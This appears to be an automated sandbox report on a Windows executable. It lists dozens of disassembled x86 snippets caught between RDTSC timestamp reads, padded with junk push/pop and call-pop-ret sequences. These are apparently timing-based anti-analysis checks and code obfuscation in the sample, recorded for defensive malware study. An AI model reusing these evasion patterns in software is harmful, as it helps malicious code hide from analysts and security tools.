Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 966F5C second address: 966FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jo 00007FAAC5092E5Ch 0x00000010 mov dword ptr [ebp+122D1A1Bh], esi 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 pushad 0x0000001a call 00007FAAC5092E66h 0x0000001f pop ecx 0x00000020 popad 0x00000021 jng 00007FAAC5092E5Bh 0x00000027 mov ebx, 5867E46Eh 0x0000002c popad 0x0000002d mov bx, EB10h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FAAC5092E58h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov ebx, 02500E6Ch 0x00000052 jmp 00007FAAC5092E67h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jnl 00007FAAC5092E58h 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 967FC8 second address: 967FCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96714A second address: 967155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 967155 second address: 9671B7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FAAC5254A91h 0x0000000e jmp 00007FAAC5254A94h 0x00000013 popad 0x00000014 nop 0x00000015 mov edi, 229CDCB0h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov bl, 22h 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a add bx, 69B6h 0x0000002f mov eax, dword ptr [ebp+122D13C5h] 0x00000035 mov bh, 7Bh 0x00000037 push FFFFFFFFh 0x00000039 mov bx, 9729h 0x0000003d push eax 0x0000003e jnp 00007FAAC5254A90h 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96AF45 second address: 96AF4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96BDC0 second address: 96BE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAAC5254A8Fh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FAAC5254A88h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr [ebp+12475D57h], eax 0x0000002e push 00000000h 0x00000030 mov bx, ax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FAAC5254A88h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f sub dword ptr [ebp+122D1872h], ecx 0x00000055 movzx edi, cx 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B0C0 second address: 96B0D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A01D second address: 96A021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A021 second address: 96A027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B0D2 second address: 96B179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FAAC5254A96h 0x0000000c nop 0x0000000d movsx ebx, bx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FAAC5254A88h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 stc 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FAAC5254A88h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000014h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D0355h] 0x00000059 call 00007FAAC5254A8Ah 0x0000005e mov edi, dword ptr [ebp+122D2A73h] 0x00000064 pop ebx 0x00000065 push FFFFFFFFh 0x00000067 pushad 0x00000068 mov dword ptr [ebp+122D229Eh], ebx 0x0000006e mov eax, ecx 0x00000070 popad 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push esi 0x00000075 jmp 00007FAAC5254A92h 0x0000007a pop esi 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96B179 second address: 96B183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FAAC5092E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A027 second address: 96A0C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FAAC5254A99h 0x0000000f nop 0x00000010 xor ebx, dword ptr [ebp+122D2B23h] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d xor dword ptr [ebp+122D1F5Fh], ebx 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a jl 00007FAAC5254A86h 0x00000030 mov eax, dword ptr [ebp+122D10E9h] 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FAAC5254A88h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 mov ebx, dword ptr [ebp+1247D971h] 0x00000056 mov dword ptr [ebp+122D1B5Fh], edx 0x0000005c push FFFFFFFFh 0x0000005e mov ebx, 1856093Dh 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FAAC5254A93h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A0C1 second address: 96A0CB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A0CB second address: 96A0DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5254A8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96A0DD second address: 96A0F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FAAC5092E58h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9690FD second address: 969190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007FAAC5254A8Dh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FAAC5254A88h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e call 00007FAAC5254A99h 0x00000033 mov bx, B3FDh 0x00000037 pop edi 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+122D2148h], eax 0x00000045 mov eax, dword ptr [ebp+122D0B31h] 0x0000004b push edx 0x0000004c clc 0x0000004d pop edi 0x0000004e mov bh, 1Eh 0x00000050 push FFFFFFFFh 0x00000052 mov dword ptr [ebp+122D18C8h], edx 0x00000058 nop 0x00000059 jmp 00007FAAC5254A90h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pushad 0x00000063 popad 0x00000064 pop ecx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 969190 second address: 969196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96CE54 second address: 96CE61 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96CE61 second address: 96CE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96BF46 second address: 96BF4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96DD9B second address: 96DE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FAAC5092E58h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D2CCFh] 0x00000029 sub di, 5E49h 0x0000002e cmc 0x0000002f push 00000000h 0x00000031 mov ebx, 1FDF5497h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FAAC5092E58h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D1F3Eh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FAAC5092E67h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96D119 second address: 96D11E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96FEE0 second address: 96FEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96F0A7 second address: 96F0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96FEE6 second address: 96FEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96FEEA second address: 96FF66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and di, 643Eh 0x00000010 push 00000000h 0x00000012 jmp 00007FAAC5254A97h 0x00000017 pushad 0x00000018 mov dword ptr [ebp+122D1F2Bh], eax 0x0000001e mov esi, ebx 0x00000020 popad 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FAAC5254A88h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 0000001Dh 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d mov ebx, dword ptr [ebp+122D246Dh] 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 ja 00007FAAC5254A99h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 972378 second address: 97237D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97237D second address: 972389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9124A5 second address: 9124B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAC5092E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9124B1 second address: 9124B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9124B6 second address: 9124E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAC5092E66h 0x00000008 jmp 00007FAAC5092E5Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976846 second address: 97684D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9769E5 second address: 9769EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAC5092E56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9769EF second address: 9769F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976B82 second address: 976B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976CE3 second address: 976D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A97h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5254A98h 0x00000011 jo 00007FAAC5254A86h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976D1F second address: 976D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976D2E second address: 976D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAC5254A94h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAC5254A8Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976D5A second address: 976D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 976D5E second address: 976D88 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FAAC5254A95h 0x00000012 jg 00007FAAC5254A86h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97CFCC second address: 97CFE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FAAC5092E5Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97CFE7 second address: 97D00A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FAAC5254A86h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D29F second address: 97D2C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jp 00007FAAC5092E56h 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAAC5092E5Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97D2C4 second address: 97D2CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982841 second address: 98284B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAC5092E6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98297B second address: 982998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A97h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982998 second address: 9829AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAC5092E61h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9829AE second address: 982A0E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAC5254A9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAAC5254A96h 0x0000000f js 00007FAAC5254AA8h 0x00000015 jmp 00007FAAC5254A8Dh 0x0000001a jmp 00007FAAC5254A95h 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FAAC5254A94h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9830D3 second address: 9830E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5092E5Ah 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9830E3 second address: 98310B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAC5254A97h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FAAC5254A86h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98310B second address: 98310F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9879ED second address: 9879F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9868D0 second address: 9868DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95DC63 second address: 95DC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95DD75 second address: 95DDAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnc 00007FAAC5092E74h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAAC5092E66h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E17D second address: 7A1967 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007FAAC5254A86h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D389Fh], ebx 0x00000015 mov cx, 77C9h 0x00000019 push dword ptr [ebp+122D026Dh] 0x0000001f stc 0x00000020 call dword ptr [ebp+122D2960h] 0x00000026 pushad 0x00000027 jnp 00007FAAC5254A8Ch 0x0000002d xor dword ptr [ebp+122D199Fh], edx 0x00000033 xor eax, eax 0x00000035 pushad 0x00000036 or eax, dword ptr [ebp+122D2AC7h] 0x0000003c xor ecx, 16AAECAEh 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 cld 0x00000048 mov dword ptr [ebp+122D2A37h], eax 0x0000004e pushad 0x0000004f movzx edx, dx 0x00000052 pushad 0x00000053 sub dword ptr [ebp+122D199Fh], ebx 0x00000059 sub dword ptr [ebp+122D199Fh], edx 0x0000005f popad 0x00000060 popad 0x00000061 mov esi, 0000003Ch 0x00000066 je 00007FAAC5254A87h 0x0000006c cmc 0x0000006d add esi, dword ptr [esp+24h] 0x00000071 mov dword ptr [ebp+122D240Dh], esi 0x00000077 lodsw 0x00000079 sub dword ptr [ebp+122D24D5h], ecx 0x0000007f jmp 00007FAAC5254A97h 0x00000084 add eax, dword ptr [esp+24h] 0x00000088 cmc 0x00000089 mov dword ptr [ebp+122D24D5h], esi 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 jmp 00007FAAC5254A8Fh 0x00000098 nop 0x00000099 push eax 0x0000009a push eax 0x0000009b push edx 0x0000009c pushad 0x0000009d popad 0x0000009e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E460 second address: 95E473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E473 second address: 95E48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAC5254A92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E48A second address: 95E49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FAAC5092E56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E53D second address: 95E547 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E547 second address: 95E568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E568 second address: 95E56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E56C second address: 95E570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E570 second address: 95E596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 jo 00007FAAC5254AA7h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAAC5254A95h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E596 second address: 95E59A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E679 second address: 95E688 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E688 second address: 95E68D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95E68D second address: 95E6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007FAAC5254A95h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d jmp 00007FAAC5254A94h 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95ED97 second address: 95ED9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95ED9D second address: 95EDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
